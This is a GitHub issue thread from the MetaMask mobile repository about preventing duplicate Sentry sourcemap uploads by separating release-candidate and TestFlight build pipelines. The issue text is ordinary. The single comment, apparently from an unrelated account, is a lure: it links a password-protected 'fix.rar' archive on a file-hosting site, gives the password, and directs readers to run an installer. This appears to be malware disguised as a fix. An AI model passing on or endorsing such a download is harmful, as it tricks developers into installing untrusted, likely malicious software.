### ISSUE TITLE
Prevent redundant Sentry sourcemap uploads

### ISSUE THREAD

**Issue by Cal-L** [MetaMask/metamask-mobile#10812]
### What is this about?

This task tracks preventing redundant Sentry sourcemap uploads. For context: We've noticed that there are duplicate sourcemaps being uploaded for releases under the same distribution name. This messes with stack traces since production bugs can now be associated with sourcemaps generated with different stack traces. In turn, this can make debugging Sentry issues impossible. The solution is to fix the system so that we only upload one set of source maps to each platform for each distributed version. 

This shows redundant sourcemaps uploaded to the same distribution name
<img width="373" alt="image" src="https://github.com/user-attachments/assets/5a575989-fbd7-4560-8416-6efdc79ee543">

### Technical Details

- It is believed that the issue occurs because certain release flows are used indiscriminately
- For example, `build_ios_release`/`build_android_release` is a step used for cutting RCs as well as uploading builds to TestFlight for testing 
  - This pipeline should be renamed/created to describe the building and staging of apps in test disruptions
  - `release_builds_to_store_pipeline` - remove this pipeline
  -  `build_send_apps_to_testflight` - create a pipeline that disables source map uploads
- In the scenario above, it's possible that `build_ios_release`/`build_android_release` overwrites the sourcemaps for the RC, which eventually becomes prod
- The technical task here is to confirm this suspicion and possibly abstract + designate a flow only used for cutting RCs. Once this flow is created, we need to ensure that only this flow uploads Sentry sourcemaps

### Acceptance Criteria

- Only a single set of sourcemaps is being uploaded to each RC/distribution version
- Reported errors in Sentry shows the correct stack trace
- The new abstracted flow creates an RC + uploads the correct sourcemaps in Sentry

### Stakeholder review needed before the work gets merged

- [ ] Engineering (needed in most cases)
- [ ] Design
- [ ] Product
- [ ] QA (automation tests are required to pass before merging PRs but not all changes are covered by automation tests - please review if QA is needed beyond automation tests)
- [ ] Security
- [ ] Legal
- [ ] Marketing
- [ ] Management (please specify)
- [ ] Other (please specify)

**Comment by huangzhaor** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."
